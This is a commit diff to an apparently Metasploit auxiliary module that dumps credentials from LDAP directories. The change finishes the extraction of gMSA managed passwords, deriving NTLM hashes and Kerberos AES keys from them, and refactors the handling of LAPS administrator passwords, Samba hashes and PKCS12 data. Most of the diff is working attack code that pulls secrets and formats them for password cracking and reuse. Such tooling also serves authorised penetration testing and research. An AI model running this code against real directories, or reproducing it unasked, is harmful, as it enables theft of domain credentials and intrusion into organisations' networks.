Finish adding gMSA secret dumping

zeroSteiner · zeroSteiner · commit 714f667c0fe4 · 2025-07-18T17:10:35.000-04:00
diff --git a/modules/auxiliary/gather/ldap_passwords.rb b/modules/auxiliary/gather/ldap_passwords.rb
@@ -109,7 +109,7 @@ def run_host(_ip)
       print_status("Searching base DN: #{base_dn}")
       entries_returned += ldap_search(ldap, base_dn, base: base_dn)
       unless @ad_ds_domain_info.nil?
-        attributes = %w[dn sAMAccountName msDS-ManagedPassword]
+        attributes = %w[dn msDS-ManagedPassword sAMAccountName]
         attributes << datastore['USER_ATTR'] unless datastore['USER_ATTR'].blank? || attributes.include?(datastore['USER_ATTR'])
         entries_returned += ldap_search(ldap, base_dn, base: base_dn, filter: '(objectClass=msDS-GroupManagedServiceAccount)', attributes: attributes)
       end
@@ -142,7 +142,7 @@ def ldap_search(ldap, base_dn, args)
           entries_returned += 1
           password_attributes.each do |attr|
             if entry[attr].any?
-              creds_found += process_hash(entry, attr)
+              creds_found += process_entry(entry, attr)
             end
           end
         end
@@ -188,7 +188,7 @@ def decode_pwdhistory(hash)
     hash
   end
 
-  def process_hash(entry, attr)
+  def process_entry(entry, attr)
     creds_found = 0
     username = [datastore['USER_ATTR'], 'sAMAccountName', 'uid', 'dn'].map { entry[_1] }.reject(&:blank?).first.first
 
@@ -229,61 +229,79 @@ def process_hash(entry, attr)
 
       if attr =~ /^samba(lm|nt)password$/
         next if private_data.length != 32
-        next if private_data.case_cmp?('aad3b435b51404eeaad3b435b51404ee') || private_data.case_cmp?('31d6cfe0d16ae931b73c59d7e0c089c0')
+        next if private_data.case_cmp?(EMPTY_LM.unpack1('H*'))
+        next if private_data.case_cmp?(EMPTY_NT.unpack1('H*'))
       end
 
       # observed sambapassword history with either 56 or 64 zeros
       next if attr == 'sambapasswordhistory' && private_data =~ /^(0{64}|0{56})$/
 
-      jtr_format = nil
-      annotation = ''
+      artifacts = SecretArtifact.new(public_data: username, private_data: private_data, private_type: :password)
 
       case attr
       when 'sambalmpassword'
-        jtr_format = 'lm'
+        artifacts.jtr_format = 'lm'
+        artifacts.private_type = :nonreplayable_hash
       when 'sambantpassword'
-        jtr_format = 'nt'
+        artifacts.jtr_format = 'nt,lm'
+        artifacts.private_type = :ntlm_hash
+        artifacts.private_data = "#{BLANK_LM.unpack('H*')}:#{private_data}"
       when 'sambapasswordhistory'
         # 795471346779677A336879366B654870 1F18DC5E346FDA5E335D9AE207C82CC9
         # where the left part is a salt and the right part is MD5(Salt+NTHash)
         # attribute value may contain multiple concatenated history entries
         # for john sort of 'md5($s.md4(unicode($p)))' - not tested
-        jtr_format = 'sambapasswordhistory'
+        artifacts.jtr_format = 'sambapasswordhistory'
+        artifacts.private_type = :nonreplayable_hash
       when 'krbprincipalkey'
-        jtr_format = 'krbprincipal'
+        artifacts.jtr_format = 'krbprincipal'
+        artifacts.private_type = :nonreplayable_hash
         # TODO: krbprincipalkey is asn.1 encoded string. In case of vmware vcenter 6.7
         # it contains user password encrypted with (23) rc4-hmac and (18) aes256-cts-hmac-sha1-96:
         # https://github.com/vmware/lightwave/blob/d50d41edd1d9cb59e7b7cc1ad284b9e46bfa703d/vmdir/server/common/krbsrvutil.c#L480-L558
         # Salted with principal name:
         # https://github.com/vmware/lightwave/blob/c4ad5a67eedfefe683357bc53e08836170528383/vmdir/thirdparty/heimdal/krb5-crypto/salt.c#L133-L175
         # In the meantime, dump the base64 encoded value.
-        private_data = Base64.strict_encode64(private_data)
+        artifacts.private_data = Base64.strict_encode64(private_data)
       when 'ms-mcs-admpwd'
         # LAPSv1 doesn't store the name of the local administrator anywhere in LDAP. It's technically configurable via Group Policy, but we'll  assume it's 'Administrator'.
-        username = 'Administrator'
-        annotation = "(expires: #{convert_nt_timestamp_to_time_string(entry['ms-mcs-admpwdexpirationtime'].first.to_i)})" if entry['ms-mcs-admpwdexpirationtime'].present?
+        artifacts.public_data = 'Administrator'
+        artifacts.annotation = "(expires: #{convert_nt_timestamp_to_time_string(entry['ms-mcs-admpwdexpirationtime'].first.to_i)})" if entry['ms-mcs-admpwdexpirationtime'].present?
       when 'msds-managedpassword'
         managed_password = MsdsManagedpasswordBlob.read(private_data)
         current_password = managed_password.buffer_fields[:current_password] # this field should always be present
         if current_password && (domain_dns_name = @ad_ds_domain_info&.fetch(:dns_name))
+          artifacts = []
           sam_account_name = entry[:sAMAccountName].first.to_s
+
           salt = "#{domain_dns_name.upcase}host#{sam_account_name.delete_suffix('$').downcase}.#{domain_dns_name.downcase}"
           encoded_current_password = current_password.force_encoding('UTF-16LE').encode('UTF-8', invalid: :replace, undef: :replace).force_encoding('ASCII-8BIT')
 
-          ntlm_hash = OpenSSL::Digest::MD4.digest(current_password)
-          ntlm_hash = "#{sam_account_name}:2105:aad3b435b51404eeaad3b435b51404ee:#{ntlm_hash.unpack1('H*')}:::"
-          aes256_key = aes256_cts_hmac_sha1_96(encoded_current_password, salt)
-          aes256_key = "#{domain_dns_name}\\#{sam_account_name}:aes256-cts-hmac-sha1-96:#{aes256_key.unpack1('H*')}"
-          aes128_key = aes128_cts_hmac_sha1_96(encoded_current_password, salt)
-          aes128_key = "#{domain_dns_name}\\#{sam_account_name}:aes128-cts-hmac-sha1-96:#{aes128_key.unpack1('H*')}"
-          des_key = des_cbc_md5(encoded_current_password, salt)
-          des_key = "#{domain_dns_name}\\#{sam_account_name}:des-cbc-md5:#{des_key.unpack1('H*')}"
-
-          print_good(ntlm_hash)
-          print_good(aes256_key)
-          print_good(aes128_key)
-          print_good(des_key)
-          private_data = 'see above'
+          artifacts << SecretArtifact.new(
+            public_data: username,
+            private_data: "#{EMPTY_LM.unpack1('H*')}:#{OpenSSL::Digest::MD4.digest(current_password).unpack1('H*')}",
+            private_type: :ntlm_hash,
+            jtr_format: 'nt,lm'
+          )
+
+          artifacts << SecretArtifact.new(
+            public_data: username,
+            private_data: Metasploit::Credential::KrbEncKey.build_data(
+              enctype: Rex::Proto::Kerberos::Crypto::Encryption::AES256,
+              key: aes256_cts_hmac_sha1_96(encoded_current_password, salt),
+              salt: salt
+            ),
+            private_type: :krb_enc_key
+          )
+          artifacts << SecretArtifact.new(
+            public_data: username,
+            private_data: Metasploit::Credential::KrbEncKey.build_data(
+              enctype: Rex::Proto::Kerberos::Crypto::Encryption::AES128,
+              key: aes128_cts_hmac_sha1_96(encoded_current_password, salt),
+              salt: salt
+            ),
+            private_type: :krb_enc_key
+          )
         end
       when 'mslaps-password'
         begin
@@ -294,34 +312,35 @@ def process_hash(entry, attr)
           next
         end
 
-        username = lapsv2['n']
-        private_data = lapsv2['p']
-        annotation = "(expires: #{convert_nt_timestamp_to_time_string(entry['mslaps-passwordexpirationtime'].first.to_i)})" if entry['mslaps-passwordexpirationtime'].present?
+        artifacts.public_data = lapsv2['n']
+        artifacts.private_data = lapsv2['p']
+        artifacts.annotation = "(expires: #{convert_nt_timestamp_to_time_string(entry['mslaps-passwordexpirationtime'].first.to_i)})" if entry['mslaps-passwordexpirationtime'].present?
       when 'mslaps-encryptedpassword'
         lapsv2 = process_result_lapsv2_encrypted(entry)
         next if lapsv2.nil?
 
-        username = lapsv2['n']
-        private_data = lapsv2['p']
-        annotation = "(expires: #{convert_nt_timestamp_to_time_string(entry['mslaps-passwordexpirationtime'].first.to_i)})" if entry['mslaps-passwordexpirationtime'].present?
+        artifacts.username = lapsv2['n']
+        artifacts.private_data = lapsv2['p']
+        artifacts.annotation = "(expires: #{convert_nt_timestamp_to_time_string(entry['mslaps-passwordexpirationtime'].first.to_i)})" if entry['mslaps-passwordexpirationtime'].present?
       when 'userpkcs12'
-        # if we get non printable chars, encode into base64
+        # if we get non-printable chars, encode into base64
         if (private_data =~ /[^[:print:]]/).nil?
-          jtr_format = 'pkcs12'
+          artifacts.jtr_format = 'pkcs12'
         else
-          jtr_format = 'pkcs12-base64'
-          private_data = Base64.strict_encode64(private_data)
+          artifacts.jtr_format = 'pkcs12-base64'
+          artifacts.private_data = Base64.strict_encode64(private_data)
         end
+        artifacts.private_type = :nonreplayable_hash
       else
         if private_data.start_with?(/{crypt}.?\$1\$/i)
-          private_data.gsub!(/{crypt}.{,2}\$1\$/i, '$1$')
-          jtr_format = 'md5crypt'
+          artifacts.private_data.gsub!(/{crypt}.{,2}\$1\$/i, '$1$')
+          artifacts.jtr_format = 'md5crypt'
         elsif private_data.start_with?(/{crypt}/i) && private_data.length == 20
           # handle {crypt}traditional_crypt case, i.e. explicitly set the hash format
-          private_data.slice!(/{crypt}/i)
+          artifacts.private_data.slice!(/{crypt}/i)
           # FIXME: what is the right jtr_hash - des,crypt or descrypt ?
           # identify_hash returns des,crypt, while JtR acceppts descrypt
-          jtr_format = 'descrypt'
+          artifacts.jtr_format = 'descrypt'
         # TODO: not sure if we shall slice the prefixes here or in the JtR/Hashcat formatter
         # elsif hash.start_with?(/{sha256}/i)
         #  hash.slice!(/{sha256}/i)
@@ -330,27 +349,51 @@ def process_hash(entry, attr)
           # handle vcenter vmdir binary hash format
           if private_data[0].ord == 1 && private_data.length == 81
             _type, private_data, salt = private_data.unpack('CH128H32')
-            private_data = "$dynamic_82$#{private_data}$HEX$#{salt}"
+            artifacts.private_data = "$dynamic_82$#{private_data}$HEX$#{salt}"
           else
             # Remove LDAP's {crypt} prefix from known hash types
-            private_data.gsub!(/{crypt}.{,2}(\$[0256][aby]?\$)/i, '\1')
+            artifacts.private_data.gsub!(/{crypt}.{,2}(\$[0256][aby]?\$)/i, '\1')
           end
-          jtr_format = Metasploit::Framework::Hashes.identify_hash(private_data)
+          artifacts.jtr_format = Metasploit::Framework::Hashes.identify_hash(artifacts.private_data)
         end
+        artifacts.private_type = :nonreplayable_hash
       end
 
-      # highlight unresolved hashes
-      jtr_format = '{crypt}' if private_data =~ /{crypt}/i
-      print_good("Credentials (#{jtr_format.blank? ? 'password' : jtr_format}) found in #{attr}: #{username}:#{private_data} #{annotation}")
+      Array.wrap(artifacts).each do |artifact|
+        # highlight unresolved hashes
+        artifact.jtr_format = '{crypt}' if artifact.private_data =~ /{crypt}/i
+
+        case artifact.private_type
+        when :krb_enc_key
+          _, enctype, key, salt = artifact.private_data.split(':')
+          formatted = "#{artifact.public_data}:#{Rex::Proto::Kerberos::Crypto::Encryption::IANA_NAMES[enctype.to_i]}:#{key}"
+        when :password
+          formatted = "#{artifact.public_data}:#{artifact.private_data}"
+        else
+          formatted = Metasploit::Framework::PasswordCracker::JtR::Formatter.params_to_jtr(
+            artifact.public_data,
+            artifact.private_data,
+            artifact.private_type,
+            format: artifact.jtr_format
+          )
+          if formatted.nil?
+            formatted = "#{artifact.public_data}:#{artifact.private_data}"
+          end
+        end
+        print_good("Credential found in #{attr}: #{formatted} #{artifact.annotation}")
+
+        report_creds(artifact.public_data, artifact.private_data, artifact.private_type, artifact.jtr_format)
+      end
 
-      report_creds(username, private_data, jtr_format)
+      # only increment once because the iteration is per-attribute so report one credential found even if it's reported
+      # in multiple formats
       creds_found += 1
     end
 
     creds_found
   end
 
-  def report_creds(username, private_data, jtr_format)
+  def report_creds(username, private_data, private_type, jtr_format)
     # this is the service the credentials came from, not necessarily where they can be used
     service_data = {
       address: rhost,
@@ -365,7 +408,7 @@ def report_creds(username, private_data, jtr_format)
       origin_type: :service,
       status: Metasploit::Model::Login::Status::UNTRIED,
       private_data: private_data,
-      private_type: (jtr_format.nil? ? :password : :nonreplayable_hash),
+      private_type: private_type,
       jtr_format: jtr_format,
       username: username
     }.merge(service_data)
@@ -375,8 +418,7 @@ def report_creds(username, private_data, jtr_format)
       credential_data[:realm_value] = @ad_ds_domain_info[:dns_name]
     end
 
-    cl = create_credential_and_login(credential_data)
-    cl.respond_to?(:core_id) ? cl.core_id : nil
+    create_credential_and_login(credential_data)
   end
 
   def process_result_lapsv2_encrypted(result)
@@ -450,6 +492,8 @@ def process_result_lapsv2_encrypted(result)
     JSON.parse(RubySMB::Field::Stringz16.read(plaintext).value)
   end
 
+  SecretArtifact = Struct.new(:public_data, :private_data, :private_type, :jtr_format, :annotation)
+
   # https://blog.xpnsec.com/lapsv2-internals/#:~:text=msLAPS%2DEncryptedPassword%20attribute
   # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-ada2/b6ea7b78-64da-48d3-87cb-2cff378e4597
   class LAPSv2EncryptedPasswordBlob < BinData::Record
